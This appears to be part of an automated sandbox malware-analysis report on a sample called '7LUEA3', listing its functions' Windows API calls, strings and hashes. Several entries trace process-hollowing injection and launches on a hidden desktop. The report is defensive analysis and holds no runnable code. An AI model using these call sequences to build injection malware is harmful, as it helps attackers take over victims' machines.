                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 799746e9b1a01add70bf1d4f0f5c1e09c2d6d298bae5fb1f1628dfbcd4265edf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01219E74604302DFC320CF58D885A1ABBE4FB88360F24896DE5E88B391E331E894CF56
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 0153E6C1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                • Opcode ID: 5d3542ea1408a0efa3efcbe44b54911dce74e080feab6c99fd6457eae64fd466
                                                                                                                                                                                                                                • Instruction ID: 91ff95ecc75e59e58102428c64bc8faa4ff29bcfb2604e8172f80098bfdad31c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3542ea1408a0efa3efcbe44b54911dce74e080feab6c99fd6457eae64fd466
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B21EEB4604306CFC760CF2CD881A1ABBE4FF99350B244969E594CB304D330E948DB52
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000002,00000000,01556E1E), ref: 01556DFE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSleepWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1443029356-0
                                                                                                                                                                                                                                • Opcode ID: 632549384a55d612050ca85bbec371cdf87ca1b559a67ab739c6032b9697633f
                                                                                                                                                                                                                                • Instruction ID: d1a6847c34df2de6c56e232bdb94e14600e8f78076cdc698c5c0a771692515aa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632549384a55d612050ca85bbec371cdf87ca1b559a67ab739c6032b9697633f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0A97060464AEFDB44EBE5D89169EB7F8FB94314FA04476E404DB650DB706E50D610
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                  • Part of subcall function 01556D19: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000002,00000000,01556E1E), ref: 01556DFE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSleepWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1443029356-0
                                                                                                                                                                                                                                • Opcode ID: 5081ebc8383093c3d7f3d377fecbf0ec1165e06a6fe3958f42edb3ed63e3f275
                                                                                                                                                                                                                                • Instruction ID: 7f171bc937ac3f48ad8b41f6ac2fdf955cbc289210be49ebaecb7e588bad7598
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5081ebc8383093c3d7f3d377fecbf0ec1165e06a6fe3958f42edb3ed63e3f275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0FC7060454AEFDB44EBE5D8907AEBBF8FB98314FA048B6E404EF550DB306E50D610
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000155F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0155F000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_155f000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                                                                                                • Instruction ID: af1e1bf8418a814dbe6e109c86ef802b0c205e0ed2f0b9ced38c7a5e41970c0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31D931108642AEEF218AAC8C48BAEFB9CBF05264F000B25F5755F6C2E7309554C7E1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0154212A
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0154213B
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 0154216F
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 015421E0
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 0154221B
                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 0154222E
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0154223B
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 01542247
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 0154227B
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 01542287
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 015422B0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,01559BA7), ref: 015599C9
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01559A96
                                                                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 01559AAE
                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01559AD6
                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01559B05
                                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 01559B57
                                                                                                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 01559B60
                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 01559B6A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 01559B6F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                • API String ID: 4190092080-2746444292
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 015565A3
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015565E4
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 01556621
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 0155665A
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 01556692
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015566A5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$Process$DesktopObjectSingleWait
                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                • API String ID: 183768610-2746444292
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 01559C82
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 01559D21
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 01559D85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 01559D9C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocLibraryLoadVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 857568384-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 01544B19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1705453755-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,01549841,00000000,01549859), ref: 01548253
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000003.1628598878.0000000009C3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 09C3C000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_3_9c3c000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 01549D6E
                                                                                                                                                                                                                                  • Part of subcall function 01549D2D: GetProcAddress.KERNEL32(00000000), ref: 01549D4B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 015558A7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 015558B8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 015558C8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 015558D8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 015558E8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 015558F8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 01555908
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,01548D30,?,?,00000000,00000000), ref: 01548A9B
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0154B002
                                                                                                                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0154B01E
                                                                                                                                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0154B057
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0154B0E3
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0154B102
                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?), ref: 0154B137
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 351091851-3916222277
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3,?,?,?,?,?,?,?,01540D8F,0153F924), ref: 01540C52
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3,?,?,?,?,?,?,?,01540D8F), ref: 01540C58
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,01540CA1,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3), ref: 01540C6D
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,01540CA1,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3), ref: 01540C73
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 01540C91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 015479A4
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 015479C1
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479C7
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,01547A31,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479DC
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,01547A31,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479E2
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 01547A04
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 01547A1A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 185507032-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153EA74
                                                                                                                                                                                                                                • LocalFree.KERNEL32(014EA240,00000000,0153EB39), ref: 0153EA86
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,014EA240,00000000,0153EB39), ref: 0153EAAA
                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00008000,014EA240,00000000,0153EB39), ref: 0153EAFB
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EB29
                                                                                                                                                                                                                                • RtlDeleteCriticalSection.NTDLL(0155C445), ref: 0153EB33
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3782394904-0
                                                                                                                                                                                                                                • Opcode ID: 8c300a387e0940b37f75ac242dfd69fc71e88d2c91c55652e31ad39deca8b45d
                                                                                                                                                                                                                                • Instruction ID: c09b4335732f69efa26d13cc6a222f5ac365bd995822b9cf8497462a89b3c038
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c300a387e0940b37f75ac242dfd69fc71e88d2c91c55652e31ad39deca8b45d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7218174904345EFDB51DBA8E866FA87FE8FB89301F110496E5109F384D6B46944DB11
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01540119: GetKeyboardType.USER32(00000000), ref: 0154011E
                                                                                                                                                                                                                                  • Part of subcall function 01540119: GetKeyboardType.USER32(00000001), ref: 0154012A
                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 01542D38
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 01542D4C
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 01542D5D
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 01542D99
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154016B
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154019E
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegCloseKey.ADVAPI32(?,015401C1,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 015401B4
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32 ref: 01542D79
                                                                                                                                                                                                                                  • Part of subcall function 01542C09: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,01542C6F), ref: 01542C2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3734044017-0
                                                                                                                                                                                                                                • Opcode ID: 381e065e6fde71399f39703ed0a28389d24e9977e4238bbdd4398ebd531915a7
                                                                                                                                                                                                                                • Instruction ID: c5551eed3e2b0bdba905df3f0da5f04022a441b5fd94f6c8e78dd9921fd5df8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 381e065e6fde71399f39703ed0a28389d24e9977e4238bbdd4398ebd531915a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F015EB44443538FD720BFF4E42A3583BE6BBE0308F190819E2A04F289D6794059B76A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154016B
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154019E
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,015401C1,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 015401B4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                                • Opcode ID: 7eec1e1e99d795c0b0be94f45e3f47c19c317cdf70d676e8063a34f110004024
                                                                                                                                                                                                                                • Instruction ID: 6119be5253db6688aaf32723b9970c26369bf63aabe8972a6155d115f5730286
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eec1e1e99d795c0b0be94f45e3f47c19c317cdf70d676e8063a34f110004024
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2801B575640309BEDB11DB90CC42FEDB7BCF744714F200165BA14DB580E6B49510D754
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,01547588,?,?,00000000), ref: 01547509
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
